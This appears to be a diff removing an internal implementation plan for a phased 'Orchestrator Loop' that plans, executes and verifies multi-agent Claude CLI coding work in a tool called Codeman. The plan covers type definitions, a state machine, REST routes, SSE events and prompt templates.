||||
### StateStore (`src/state-store.ts`)
|
||||
```typescript
|
||||
// Add to AppState interface
|
||||
orchestrator?: OrchestratorPersistState;
|
||||
|
||||
// Add methods
|
||||
getOrchestratorState(): OrchestratorPersistState;
|
||||
setOrchestratorState(state: Partial<OrchestratorPersistState>): void;
|
||||
```
|
||||
|
||||
### SSE Events (`src/web/sse-events.ts`)
|
||||
```typescript
|
||||
// Add ~8 new events
|
||||
export const SseEvent = {
|
||||
// ... existing
|
||||
ORCHESTRATOR_STATE_CHANGED: 'orchestrator:stateChanged',
|
||||
ORCHESTRATOR_PLAN_READY: 'orchestrator:planReady',
|
||||
ORCHESTRATOR_PHASE_STARTED: 'orchestrator:phaseStarted',
|
||||
ORCHESTRATOR_PHASE_COMPLETED: 'orchestrator:phaseCompleted',
|
||||
ORCHESTRATOR_PHASE_FAILED: 'orchestrator:phaseFailed',
|
||||
ORCHESTRATOR_VERIFICATION: 'orchestrator:verificationResult',
|
||||
ORCHESTRATOR_COMPLETED: 'orchestrator:completed',
|
||||
ORCHESTRATOR_ERROR: 'orchestrator:error',
|
||||
} as const;
|
||||
```
|
||||
|
||||
### Frontend Constants (`src/web/public/constants.js`)
|
||||
```javascript
|
||||
// Mirror SSE events
|
||||
SSE_EVENTS.ORCHESTRATOR_STATE_CHANGED = 'orchestrator:stateChanged';
|
||||
// ... etc
|
||||
```
|
||||
|
||||
### Route Registration (`src/web/routes/index.ts`)
|
||||
```typescript
|
||||
import { registerOrchestratorRoutes } from './orchestrator-routes.js';
|
||||
// Add to barrel export
|
||||
```
|
||||
|
||||
### Server (`src/web/server.ts`)
|
||||
```typescript
|
||||
// Initialize OrchestratorLoop alongside RalphLoop
|
||||
const orchestratorLoop = new OrchestratorLoop(config);
|
||||
|
||||
// Register routes
|
||||
registerOrchestratorRoutes(app, { ...ctx, orchestrator: orchestratorLoop });
|
||||
```
|
||||
|
||||
### Port Interface (`src/web/ports/`)
|
||||
```typescript
|
||||
// New port
|
||||
export interface OrchestratorPort {
|
||||
orchestrator: OrchestratorLoop;
|
||||
}
|
||||
```
|
||||
|
||||
## Prompt Flow Through System
|
||||
|
||||
The key insight is how prompts flow from Orchestrator → Session → Claude:
|
||||
|
||||
```
|
||||
OrchestratorLoop decides to execute Phase 3, Task 2
|
||||
│
|
||||
▼
|
||||
Converts OrchestratorTask to CreateTaskOptions:
|
||||
{
|
||||
prompt: "Implement the rate limiter middleware. Read src/middleware/auth.ts
|
||||
for the pattern. Add to src/middleware/rate-limiter.ts. Must export
|
||||
a Fastify plugin. When done: <promise>PHASE_3_TASK_2_DONE</promise>",
|
||||
priority: 100,
|
||||
dependencies: ["phase-3-task-1"], // Must finish auth middleware first
|
||||
completionPhrase: "PHASE_3_TASK_2_DONE",
|
||||
timeoutMs: 600000 // 10 minutes
|
||||
}
|
||||
│
|
||||
▼
|
||||
TaskQueue.addTask(options)
|
||||
│
|
||||
▼
|
||||
RalphLoop.tick() → assignTasks() // OR OrchestratorLoop does its own assignment
|
||||
│
|
||||
▼
|
||||
session.sendInput(task.prompt)
|
||||
│
|
||||
▼
|
||||
writeViaMux() → tmux send-keys -l "prompt..." + Enter
|
||||
│
|
||||
▼
|
||||
Claude CLI receives prompt, executes, outputs results
|
||||
│
|
||||
▼
|
||||
RalphTracker.processData() → detects "PHASE_3_TASK_2_DONE"
|
||||
│
|
||||
▼
|
||||
emit('completionDetected') → OrchestratorLoop.handleTaskCompleted()
|
||||
│
|
||||
▼
|
||||
Check: all tasks in Phase 3 done? → If yes → verifyPhase(phase3)
|
||||
```
|
||||
|
||||
## Team Agent Flow (When Enabled)
|
||||
|
||||
```
|
||||
Phase has teamStrategy.type === 'team'
|
||||
│
|
||||
▼
|
||||
OrchestratorLoop creates/reuses a session with:
|
||||
env: { CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS: '1' }
|
||||
│
|
||||
▼
|
||||
Sends team orchestration prompt:
|
||||
"You're the team lead for Phase 3: Core Implementation.
|
||||
|
||||
Your team should work on these tasks in parallel:
|
||||
1. Rate limiter middleware (teammate 1)
|
||||
2. Error handling middleware (teammate 2)
|
||||
3. Validation layer (teammate 3)
|
||||
|
||||
Context files to read first: [...]
|
||||
Each teammate should output their task's completion phrase when done.
|
||||
When ALL tasks are complete, output: <promise>PHASE_3_COMPLETE</promise>"
|
||||
│
|
||||
▼
|
||||
Claude Code team-lead spawns teammates
|
||||
│
|
||||
▼
|
||||
TeamWatcher detects new team in ~/.claude/teams/
|
||||
→ Matches to session via leadSessionId
|
||||
→ Tracks teammate activity
|
||||
│
|
||||
▼
|
||||
Teammates work in parallel (in-process threads)
|
||||
│
|
||||
▼
|
||||
hook: teammate_idle → POST /api/hook-event
|
||||
→ OrchestratorLoop notes teammate finished
|
||||
│
|
||||
▼
|
||||
hook: task_completed → POST /api/hook-event
|
||||
→ Or: RalphTracker detects PHASE_3_COMPLETE
|
||||
→ OrchestratorLoop → phase complete → verify
|
||||
```
|
||||
|
||||
## Error Recovery Strategy
|
||||
|
||||
```
|
||||
Task fails (timeout, error, session crash)
|
||||
│
|
||||
├─ Task-level retry (up to 2 retries per task)
|
||||
│ → Reset task to pending
|
||||
│ → Re-queue with modified prompt: "Previous attempt failed: {error}. Try again..."
|
||||
│
|
||||
├─ Phase-level retry (up to 3 retries per phase)
|
||||
│ → Respawn session (fresh context)
|
||||
│ → Re-execute entire phase with learnings from failure
|
||||
│ → Modified prompt includes what went wrong
|
||||
│
|
||||
└─ Orchestration-level failure
|
||||
→ All retries exhausted
|
||||
→ state = FAILED
|
||||
→ Notify user with detailed failure report
|
||||
→ User can: modify plan → retry, skip phase → continue, or stop
|
||||
```
|
||||
|
||||
## Interaction with Ralph Loop
|
||||
|
||||
Ralph Loop and Orchestrator Loop are **mutually exclusive** on the same sessions:
|
||||
|
||||
```
|
||||
if (orchestratorLoop.isRunning()) {
|
||||
// Orchestrator controls task assignment
|
||||
// Ralph Loop should not interfere
|
||||
// Respawn Controller uses 'orchestrator' preset
|
||||
}
|
||||
|
||||
if (ralphLoop.isRunning()) {
|
||||
// Ralph controls task assignment
|
||||
// Orchestrator should not start
|
||||
}
|
||||
```
|
||||
|
||||
The Orchestrator can optionally USE the Ralph Loop internally for phase execution (delegate phase tasks to Ralph's queue), or manage task assignment directly. Decision: **manage directly** — gives more control over phase boundaries and verification timing.
|
||||
|
||||
## Summary of What Touches What
|
||||
|
||||
| Existing File | Change |
|
||||
|---|---|
|
||||
| `src/types/index.ts` | Export orchestrator types |
|
||||
| `src/state-store.ts` | Add orchestrator state persistence |
|
||||
| `src/web/sse-events.ts` | Add ~8 orchestrator events |
|
||||
| `src/web/routes/index.ts` | Register orchestrator routes |
|
||||
| `src/web/server.ts` | Initialize OrchestratorLoop |
|
||||
| `src/web/public/constants.js` | Mirror SSE events |
|
||||
| `src/web/public/app.js` | Add orchestrator event listeners, panel toggle |
|
||||
| `src/web/route-helpers.ts` | Add 'orchestrator' respawn preset |
|
||||
|
||||
| New File | Purpose |
|
||||
|---|---|
|
||||
| `src/orchestrator-loop.ts` | Core state machine |
|
||||
| `src/orchestrator-planner.ts` | Plan generation + phasing |
|
||||
| `src/orchestrator-verifier.ts` | Phase verification |
|
||||
| `src/types/orchestrator.ts` | Type definitions |
|
||||
| `src/prompts/orchestrator.ts` | Prompt templates |
|
||||
| `src/web/routes/orchestrator-routes.ts` | API endpoints |
|
||||
| `src/web/public/orchestrator-ui.js` | Frontend panel |
|
||||
| `src/web/ports/orchestrator-port.ts` | Port interface |
|
||||
@@ -1,633 +0,0 @@
|
||||
# Orchestrator Loop — Detailed Implementation Plan (v2)
|
||||
|
||||
> Internal research/planning document. Not for GitHub.
|
||||
|
||||
## Vision
|
||||
|
||||
The **Orchestrator Loop** is a new autonomous execution mode that transforms high-level user goals into phased, verified, team-coordinated implementations. Unlike Ralph Loop (flat task queue → idle sessions), the Orchestrator manages the full lifecycle: **plan → approve → execute → verify → adapt → complete**.
|
||||
|
||||
```
|
||||
USER: "Add OAuth2 login with Google/GitHub, role-based access control, and API key management"
|
||||
|
||||
ORCHESTRATOR:
|
||||
Phase 1: Research & Setup ✅ (3m) — scaffold, deps, config
|
||||
Phase 2: Auth Core ✅ (8m) — OAuth2 flow, session mgmt
|
||||
Phase 3: Provider Integration 🔄 (12m) — Google + GitHub (parallel via team agents)
|
||||
Phase 4: RBAC ⏳ — roles, permissions, middleware
|
||||
Phase 5: API Keys ⏳ — generation, validation, rate limits
|
||||
Phase 6: Testing & Review ⏳ — integration tests, security review
|
||||
|
||||
Progress: ━━━━━━━━━━━━━━━━━━━━ 40% | Agents: 3 active | Time: 23m
|
||||
```
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ OrchestratorLoop │
|
||||
│ │
|
||||
│ ┌────────────────┐ ┌────────────────┐ ┌──────────────────┐ │
|
||||
│ │ Orchestrator │ │ Orchestrator │ │ Orchestrator │ │
|
||||
│ │ Planner │ │ Executor │ │ Verifier │ │
|
||||
│ │ │ │ │ │ │ │
|
||||
│ │ PlanOrchestrator│ │ TaskQueue │ │ AI review │ │
|
||||
│ │ + phase grouper│ │ SessionManager │ │ Test commands │ │
|
||||
│ │ + team strategy│ │ Team prompts │ │ File checks │ │
|
||||
│ └───────┬────────┘ └───────┬────────┘ └─────────┬────────┘ │
|
||||
│ │ │ │ │
|
||||
│ └───────────────────┼──────────────────────┘ │
|
||||
│ │ │
|
||||
│ ┌─────────▼─────────┐ │
|
||||
│ │ Existing Codeman │ │
|
||||
│ │ Infrastructure │ │
|
||||
│ │ │ │
|
||||
│ │ SessionManager │ │
|
||||
│ │ TaskQueue │ │
|
||||
│ │ RespawnController │ │
|
||||
│ │ TeamWatcher │ │
|
||||
│ │ PlanOrchestrator │ │
|
||||
│ │ StateStore │ │
|
||||
│ │ Hooks + SSE │ │
|
||||
│ └────────────────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## State Machine
|
||||
|
||||
```
|
||||
┌─────────┐
|
||||
│ IDLE │
|
||||
└────┬────┘
|
||||
│ start(goal)
|
||||
▼
|
||||
┌─────────┐
|
||||
┌────────│PLANNING │────────┐
|
||||
│ fail └────┬────┘ │
|
||||
▼ │ plan ready │ user cancels
|
||||
┌────────┐ ▼ ▼
|
||||
│ FAILED │ ┌─────────┐ ┌────────┐
|
||||
└────────┘ │APPROVAL │ │ IDLE │
|
||||
▲ └────┬────┘ └────────┘
|
||||
│ │ approve
|
||||
│ ▼
|
||||
│ ┌──────────┐
|
||||
│ ┌───►│EXECUTING │◄────────────────────┐
|
||||
│ │ └────┬─────┘ │
|
||||
│ │ │ all tasks in phase done │
|
||||
│ │ ▼ │
|
||||
│ │ ┌──────────┐ │
|
||||
│ │ │VERIFYING │ │
|
||||
│ │ └────┬─────┘ │
|
||||
│ │ pass │ │ fail │
|
||||
│ │ ▼ ▼ │
|
||||
│ │ more ┌──────────┐ │
|
||||
│ │ phases?│REPLANNING│── retry ────────┘
|
||||
│ │ │ └────┬─────┘
|
||||
│ │ │ │ max retries
|
||||
│ │ │ ▼
|
||||
│ │ │ ┌────────┐
|
||||
│ └────┘ │ FAILED │
|
||||
│ next └────────┘
|
||||
│ phase
|
||||
│ │
|
||||
│ ▼
|
||||
│ ┌───────────┐
|
||||
└─│ COMPLETED │
|
||||
└───────────┘
|
||||
```
|
||||
|
||||
**States:** `idle` | `planning` | `approval` | `executing` | `verifying` | `replanning` | `completed` | `failed` | `paused`
|
||||
|
||||
Transitions are event-driven. The state machine is the single source of truth — all methods check `this.state` before acting.
|
||||
|
||||
## Type Definitions
|
||||
|
||||
### `src/types/orchestrator.ts`
|
||||
|
||||
```typescript
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
// State Machine
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
|
||||
export type OrchestratorState =
|
||||
| 'idle'
|
||||
| 'planning'
|
||||
| 'approval'
|
||||
| 'executing'
|
||||
| 'verifying'
|
||||
| 'replanning'
|
||||
| 'completed'
|
||||
| 'failed'
|
||||
| 'paused';
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
// Plan Structure
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
|
||||
export interface OrchestratorPlan {
|
||||
id: string;
|
||||
goal: string;
|
||||
createdAt: number;
|
||||
phases: OrchestratorPhase[];
|
||||
metadata: {
|
||||
totalTasks: number;
|
||||
estimatedComplexity: 'low' | 'medium' | 'high';
|
||||
modelUsed: string;
|
||||
planDurationMs: number;
|
||||
};
|
||||
}
|
||||
|
||||
export interface OrchestratorPhase {
|
||||
id: string; // "phase-1", "phase-2"
|
||||
name: string; // Human-readable name
|
||||
description: string;
|
||||
order: number;
|
||||
status: PhaseStatus;
|
||||
tasks: OrchestratorTask[];
|
||||
verificationCriteria: string[];
|
||||
testCommands: string[];
|
||||
maxAttempts: number; // Default: 3
|
||||
attempts: number; // Current attempt count
|
||||
startedAt: number | null;
|
||||
completedAt: number | null;
|
||||
durationMs: number | null;
|
||||
teamStrategy: TeamStrategy;
|
||||
}
|
||||
|
||||
export type PhaseStatus =
|
||||
| 'pending'
|
||||
| 'executing'
|
||||
| 'verifying'
|
||||
| 'passed'
|
||||
| 'failed'
|
||||
| 'skipped';
|
||||
|
||||
export interface OrchestratorTask {
|
||||
id: string; // "phase-1-task-1"
|
||||
phaseId: string;
|
||||
prompt: string; // Single-line prompt for Claude
|
||||
status: 'pending' | 'running' | 'completed' | 'failed';
|
||||
assignedSessionId: string | null;
|
||||
queueTaskId: string | null; // Links to TaskQueue task
|
||||
parallel: boolean; // Can run in parallel with sibling tasks
|
||||
completionPhrase: string; // Unique phrase for completion detection
|
||||
timeoutMs: number;
|
||||
startedAt: number | null;
|
||||
completedAt: number | null;
|
||||
error: string | null;
|
||||
retries: number;
|
||||
}
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
// Team Strategy
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
|
||||
export type TeamStrategy =
|
||||
| { type: 'single' } // One session handles all
|
||||
| { type: 'parallel'; maxSessions: number } // Multiple sessions
|
||||
| { type: 'team'; config: TeamSetup } // Agent teams
|
||||
|
||||
export interface TeamSetup {
|
||||
leadPrompt: string;
|
||||
suggestedTeammates: string[]; // Role descriptions
|
||||
maxTeammates: number;
|
||||
}
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
// Verification
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
|
||||
export interface VerificationResult {
|
||||
passed: boolean;
|
||||
checks: VerificationCheck[];
|
||||
summary: string;
|
||||
suggestions: string[]; // Recovery hints for replanning
|
||||
}
|
||||
|
||||
export interface VerificationCheck {
|
||||
type: 'test_command' | 'ai_review' | 'file_check';
|
||||
description: string;
|
||||
passed: boolean;
|
||||
output?: string;
|
||||
}
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
// Configuration
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
|
||||
export interface OrchestratorConfig {
|
||||
plannerModel: string; // Default: 'opus'
|
||||
researchEnabled: boolean; // Default: true
|
||||
autoApprove: boolean; // Default: false
|
||||
maxPhaseRetries: number; // Default: 3
|
||||
phaseTimeoutMs: number; // Default: 1800000 (30min)
|
||||
enableTeamAgents: boolean; // Default: true
|
||||
maxParallelSessions: number; // Default: 3
|
||||
verificationMode: 'strict' | 'moderate' | 'lenient';
|
||||
compactBetweenPhases: boolean; // Default: true
|
||||
}
|
||||
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
// Persistence (saved to ~/.codeman/state.json)
|
||||
// ═══════════════════════════════════════════════════════════════
|
||||
|
||||
export interface OrchestratorPersistState {
|
||||
state: OrchestratorState;
|
||||
plan: OrchestratorPlan | null;
|
||||
currentPhaseIndex: number;
|
||||
startedAt: number | null;
|
||||
completedAt: number | null;
|
||||
config: OrchestratorConfig;
|
||||
stats: OrchestratorStats;
|
||||
}
|
||||
|
||||
export interface OrchestratorStats {
|
||||
phasesCompleted: number;
|
||||
phasesFailed: number;
|
||||
totalTasksCompleted: number;
|
||||
totalTasksFailed: number;
|
||||
totalDurationMs: number;
|
||||
replanCount: number;
|
||||
}
|
||||
```
|
||||
|
||||
## New Files (Implementation Order)
|
||||
|
||||
### Step 1: `src/types/orchestrator.ts` — Type definitions
|
||||
All interfaces above. No dependencies. ~120 lines.
|
||||
|
||||
### Step 2: `src/orchestrator-planner.ts` — Plan generation + phase grouping
|
||||
~300 lines. Wraps existing PlanOrchestrator.
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Orchestrator plan generation — converts goals into phased plans.
|
||||
*
|
||||
* Uses PlanOrchestrator for AI plan generation, then groups PlanItems into
|
||||
* sequential phases with team strategies and verification criteria.
|
||||
*
|
||||
* @module orchestrator-planner
|
||||
*/
|
||||
|
||||
export class OrchestratorPlanner {
|
||||
constructor(mux: TerminalMultiplexer, workingDir: string, config: OrchestratorConfig);
|
||||
|
||||
/** Generate plan from goal. Uses PlanOrchestrator internally. */
|
||||
async generatePlan(goal: string, onProgress?: ProgressCallback): Promise<OrchestratorPlan>;
|
||||
|
||||
/** Cancel in-progress plan generation. */
|
||||
async cancel(): Promise<void>;
|
||||
|
||||
// Internal
|
||||
private groupIntoPhases(items: PlanItem[], goal: string): OrchestratorPhase[];
|
||||
private assignTeamStrategies(phases: OrchestratorPhase[]): void;
|
||||
private generateCompletionPhrases(plan: OrchestratorPlan): void;
|
||||
}
|
||||
```
|
||||
|
||||
**Phase grouping algorithm:**
|
||||
1. Topological sort by `PlanItem.dependencies`
|
||||
2. Group into dependency layers (Kahn's algorithm)
|
||||
3. Within each layer, sub-group by `tddPhase` (setup → test → impl → verify → review)
|
||||
4. Merge adjacent small phases (< 2 tasks) if they share the same tddPhase
|
||||
5. Assign team strategies:
|
||||
- 1-2 tasks → `{ type: 'single' }`
|
||||
- 3+ independent tasks → `{ type: 'parallel', maxSessions: Math.min(taskCount, config.maxParallelSessions) }`
|
||||
- 4+ tasks with high complexity → `{ type: 'team', config: { ... } }`
|
||||
6. Generate unique completion phrases per task: `ORCH_P{phaseOrder}_T{taskIndex}`
|
||||
|
||||
### Step 3: `src/orchestrator-verifier.ts` — Phase verification
|
||||
~200 lines.
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Orchestrator phase verification.
|
||||
*
|
||||
* Runs verification checks after each phase completes:
|
||||
* test commands, AI review, and file existence checks.
|
||||
*
|
||||
* @module orchestrator-verifier
|
||||
*/
|
||||
|
||||
export class OrchestratorVerifier {
|
||||
constructor(config: OrchestratorConfig);
|
||||
|
||||
/** Run all verification checks for a completed phase. */
|
||||
async verifyPhase(
|
||||
phase: OrchestratorPhase,
|
||||
session: Session,
|
||||
mode: 'strict' | 'moderate' | 'lenient'
|
||||
): Promise<VerificationResult>;
|
||||
|
||||
// Verification strategies
|
||||
private async runTestCommands(commands: string[], session: Session): Promise<VerificationCheck[]>;
|
||||
private async aiReview(phase: OrchestratorPhase, session: Session): Promise<VerificationCheck>;
|
||||
}
|
||||
```
|
||||
|
||||
**Verification modes:**
|
||||
- `strict`: ALL test commands must pass AND AI review must approve
|
||||
- `moderate`: Test commands must pass, AI review is advisory
|
||||
- `lenient`: At least one test command passes, AI review skipped
|
||||
|
||||
**AI review prompt (sent as a task to the session):**
|
||||
```
|
||||
Review Phase "{phase.name}" completion. Check:
|
||||
1. Expected functionality works
|
||||
2. No obvious regressions
|
||||
3. Code quality is acceptable
|
||||
|
||||
Criteria: {phase.verificationCriteria.join('\n')}
|
||||
|
||||
If ALL criteria are met, respond: ORCH_VERIFY_PASS
|
||||
If ANY criteria fail, respond: ORCH_VERIFY_FAIL and explain what failed.
|
||||
```
|
||||
|
||||
### Step 4: `src/orchestrator-loop.ts` — Core state machine
|
||||
~500 lines. Main orchestrator engine.
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Orchestrator Loop — phased plan execution with team agents.
|
||||
*
|
||||
* State machine that generates plans from user goals, executes them
|
||||
* phase-by-phase with verification gates, and adapts on failure.
|
||||
*
|
||||
* @module orchestrator-loop
|
||||
*/
|
||||
|
||||
export interface OrchestratorLoopEvents {
|
||||
stateChanged: (state: OrchestratorState, prevState: OrchestratorState) => void;
|
||||
planReady: (plan: OrchestratorPlan) => void;
|
||||
phaseStarted: (phase: OrchestratorPhase) => void;
|
||||
phaseCompleted: (phase: OrchestratorPhase) => void;
|
||||
phaseFailed: (phase: OrchestratorPhase, reason: string) => void;
|
||||
taskAssigned: (task: OrchestratorTask, sessionId: string) => void;
|
||||
taskCompleted: (task: OrchestratorTask) => void;
|
||||
taskFailed: (task: OrchestratorTask, error: string) => void;
|
||||
verificationResult: (phase: OrchestratorPhase, result: VerificationResult) => void;
|
||||
completed: (stats: OrchestratorStats) => void;
|
||||
error: (error: Error) => void;
|
||||
}
|
||||
|
||||
export class OrchestratorLoop extends EventEmitter {
|
||||
private state: OrchestratorState = 'idle';
|
||||
private plan: OrchestratorPlan | null = null;
|
||||
private currentPhaseIndex = 0;
|
||||
private config: OrchestratorConfig;
|
||||
private planner: OrchestratorPlanner;
|
||||
private verifier: OrchestratorVerifier;
|
||||
private sessionManager: SessionManager;
|
||||
private taskQueue: TaskQueue;
|
||||
private store: StateStore;
|
||||
private stats: OrchestratorStats;
|
||||
private cleanup: CleanupManager;
|
||||
private pausedState: OrchestratorState | null = null; // State before pause
|
||||
|
||||
// ── Lifecycle ──────────────────────────────────────────────
|
||||
|
||||
constructor(mux: TerminalMultiplexer, workingDir: string, config?: Partial<OrchestratorConfig>);
|
||||
|
||||
/** Start orchestration with a goal. Transitions: idle → planning */
|
||||
async start(goal: string): Promise<void>;
|
||||
|
||||
/** Approve the generated plan. Transitions: approval → executing */
|
||||
async approve(): Promise<void>;
|
||||
|
||||
/** Reject plan with feedback. Transitions: approval → planning (regenerate) */
|
||||
async reject(feedback: string): Promise<void>;
|
||||
|
||||
/** Pause execution. Saves current state. */
|
||||
pause(): void;
|
||||
|
||||
/** Resume from pause. */
|
||||
resume(): void;
|
||||
|
||||
/** Stop everything and clean up. → idle */
|
||||
async stop(): Promise<void>;
|
||||
|
||||
/** Skip current phase. → executing (next phase) or completed */
|
||||
async skipPhase(phaseId: string): Promise<void>;
|
||||
|
||||
/** Retry a failed phase. → executing */
|
||||
async retryPhase(phaseId: string): Promise<void>;
|
||||
|
||||
// ── Getters ────────────────────────────────────────────────
|
||||
|
||||
getState(): OrchestratorState;
|
||||
getPlan(): OrchestratorPlan | null;
|
||||
getCurrentPhase(): OrchestratorPhase | null;
|
||||
getStats(): OrchestratorStats;
|
||||
getStatus(): OrchestratorPersistState;
|
||||
|
||||
// ── Internal: Phase Execution ──────────────────────────────
|
||||
|
||||
private async executeCurrentPhase(): Promise<void>;
|
||||
private async executePhase(phase: OrchestratorPhase): Promise<void>;
|
||||
private async assignPhaseTasks(phase: OrchestratorPhase): Promise<void>;
|
||||
private handleTaskCompleted(taskId: string): void;
|
||||
private handleTaskFailed(taskId: string, error: string): void;
|
||||
private async onPhaseTasksComplete(phase: OrchestratorPhase): Promise<void>;
|
||||
|
||||
// ── Internal: Verification ─────────────────────────────────
|
||||
|
||||
private async verifyCurrentPhase(): Promise<void>;
|
||||
private async handleVerificationResult(phase: OrchestratorPhase, result: VerificationResult): Promise<void>;
|
||||
|
||||
// ── Internal: Replanning ───────────────────────────────────
|
||||
|
||||
private async replanPhase(phase: OrchestratorPhase, failures: string[]): Promise<void>;
|
||||
|
||||
// ── Internal: State Machine ────────────────────────────────
|
||||
|
||||
private setState(newState: OrchestratorState): void;
|
||||
private advanceToNextPhase(): Promise<void>;
|
||||
private persist(): void;
|
||||
private restore(): void;
|
||||
}
|
||||
```
|
||||
|
||||
**Key execution flow in `executePhase()`:**
|
||||
1. Mark phase as `executing`, emit `phaseStarted`
|
||||
2. For each task in phase:
|
||||
- Create a `CreateTaskOptions` from `OrchestratorTask`
|
||||
- Add to `TaskQueue` with proper dependencies + completion phrase
|
||||
- Store the TaskQueue task ID in `OrchestratorTask.queueTaskId`
|
||||
3. Poll task completion (listen to TaskQueue events)
|
||||
4. When all tasks complete → call `onPhaseTasksComplete()`
|
||||
5. `onPhaseTasksComplete()` triggers verification
|
||||
|
||||
**How tasks get assigned to sessions:**
|
||||
The OrchestratorLoop does NOT manage session assignment directly. It adds tasks to the existing TaskQueue and starts a mini poll loop that assigns pending tasks to idle sessions — the same pattern as RalphLoop's `assignTasks()`. This reuses existing session management.
|
||||
|
||||
**Team agent flow:**
|
||||
For phases with `teamStrategy.type === 'team'`:
|
||||
- Start a single session with `CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`
|
||||
- Instead of adding individual tasks to TaskQueue, send ONE comprehensive prompt to the lead
|
||||
- The prompt instructs the lead to create teammates and delegate
|
||||
- Monitor via TeamWatcher for team task completion + hook events
|
||||
- Phase completion is detected via the lead's completion phrase
|
||||
|
||||
### Step 5: `src/web/routes/orchestrator-routes.ts` — API endpoints
|
||||
~300 lines.
|
||||
|
||||
```
|
||||
POST /api/orchestrator/start — { goal, config? } → start planning
|
||||
POST /api/orchestrator/approve — approve generated plan
|
||||
POST /api/orchestrator/reject — { feedback } → reject + replan
|
||||
POST /api/orchestrator/pause — pause execution
|
||||
POST /api/orchestrator/resume — resume execution
|
||||
POST /api/orchestrator/stop — stop orchestration
|
||||
GET /api/orchestrator/status — full state + plan + stats
|
||||
GET /api/orchestrator/plan — plan details only
|
||||
POST /api/orchestrator/phase/:id/skip — skip a phase
|
||||
POST /api/orchestrator/phase/:id/retry — retry a failed phase
|
||||
```
|
||||
|
||||
Port dependency: `SessionPort & EventPort & RespawnPort & ConfigPort & InfraPort`
|
||||
|
||||
The route module receives the OrchestratorLoop instance via the InfraPort (added to `createRouteContext()`).
|
||||
|
||||
### Step 6: SSE Events — `src/web/sse-events.ts` additions
|
||||
|
||||
```typescript
|
||||
// ─── Orchestrator ────────────────────────────────────────────────────────────
|
||||
|
||||
/** Orchestrator state machine transitioned. */
|
||||
export const OrchestratorStateChanged = 'orchestrator:stateChanged' as const;
|
||||
/** Orchestrator plan generated and ready for approval. */
|
||||
export const OrchestratorPlanReady = 'orchestrator:planReady' as const;
|
||||
/** Orchestrator phase started executing. */
|
||||
export const OrchestratorPhaseStarted = 'orchestrator:phaseStarted' as const;
|
||||
/** Orchestrator phase completed successfully. */
|
||||
export const OrchestratorPhaseCompleted = 'orchestrator:phaseCompleted' as const;
|
||||
/** Orchestrator phase failed. */
|
||||
export const OrchestratorPhaseFailed = 'orchestrator:phaseFailed' as const;
|
||||
/** Orchestrator verification result for a phase. */
|
||||
export const OrchestratorVerification = 'orchestrator:verification' as const;
|
||||
/** Orchestrator task assigned to session. */
|
||||
export const OrchestratorTaskAssigned = 'orchestrator:taskAssigned' as const;
|
||||
/** Orchestrator task completed. */
|
||||
export const OrchestratorTaskCompleted = 'orchestrator:taskCompleted' as const;
|
||||
/** Orchestrator task failed. */
|
||||
export const OrchestratorTaskFailed = 'orchestrator:taskFailed' as const;
|
||||
/** All phases completed successfully. */
|
||||
export const OrchestratorCompleted = 'orchestrator:completed' as const;
|
||||
/** Orchestrator error. */
|
||||
export const OrchestratorError = 'orchestrator:error' as const;
|
||||
```
|
||||
|
||||
11 new events. Add to `SseEvent` namespace object + mirror in `constants.js`.
|
||||
|
||||
### Step 7: State persistence — `src/state-store.ts` additions
|
||||
|
||||
Add to `AppState`:
|
||||
```typescript
|
||||
orchestrator?: OrchestratorPersistState;
|
||||
```
|
||||
|
||||
Add methods:
|
||||
```typescript
|
||||
getOrchestratorState(): OrchestratorPersistState | null;
|
||||
setOrchestratorState(state: Partial<OrchestratorPersistState>): void;
|
||||
clearOrchestratorState(): void;
|
||||
```
|
||||
|
||||
### Step 8: Server integration — `src/web/server.ts` modifications
|
||||
|
||||
1. Import `OrchestratorLoop` and `registerOrchestratorRoutes`
|
||||
2. Add `private orchestratorLoop: OrchestratorLoop` field
|
||||
3. Initialize in constructor (lazy — created on first start, not at boot)
|
||||
4. Add to `createRouteContext()` InfraPort: `orchestratorLoop: this.orchestratorLoop`
|
||||
5. Wire up OrchestratorLoop events → SSE broadcasts
|
||||
6. Register routes: `registerOrchestratorRoutes(this.app, ctx)`
|
||||
7. Clean up in `stop()`
|
||||
|
||||
### Step 9: `src/web/public/orchestrator-ui.js` — Frontend panel
|
||||
~500 lines. New frontend module.
|
||||
|
||||
**Load order**: After `panels-ui.js` (11), before `ralph-wizard.js` (13). So load order = 11.5.
|
||||
|
||||
**UI elements:**
|
||||
- Goal input form (text area + config toggles)
|
||||
- Plan approval view (phase list, task details, approve/reject buttons)
|
||||
- Execution dashboard (progress bar, phase cards, task status indicators)
|
||||
- Agent activity panel (session count, team status)
|
||||
- Controls (pause, resume, stop, skip phase, retry phase)
|
||||
|
||||
**SSE listeners:**
|
||||
- All 11 orchestrator events → update UI state
|
||||
- Reuses existing session/respawn/team event handlers for agent monitoring
|
||||
|
||||
### Step 10: `src/prompts/orchestrator.ts` — Prompt templates
|
||||
~200 lines.
|
||||
|
||||
Templates for:
|
||||
- Phase execution prompt (tells Claude what to do in this phase)
|
||||
- Team lead delegation prompt (instructs lead to create and coordinate teammates)
|
||||
- Verification prompt (asks Claude to verify phase output)
|
||||
- Replan prompt (gives failure context, asks for recovery steps)
|
||||
|
||||
### Step 11: Constants, schemas, route barrel updates
|
||||
|
||||
- `src/web/public/constants.js` — Add 11 SSE event mirrors
|
||||
- `src/web/schemas.ts` — Add Zod schemas for orchestrator API input validation
|
||||
- `src/web/routes/index.ts` — Export `registerOrchestratorRoutes`
|
||||
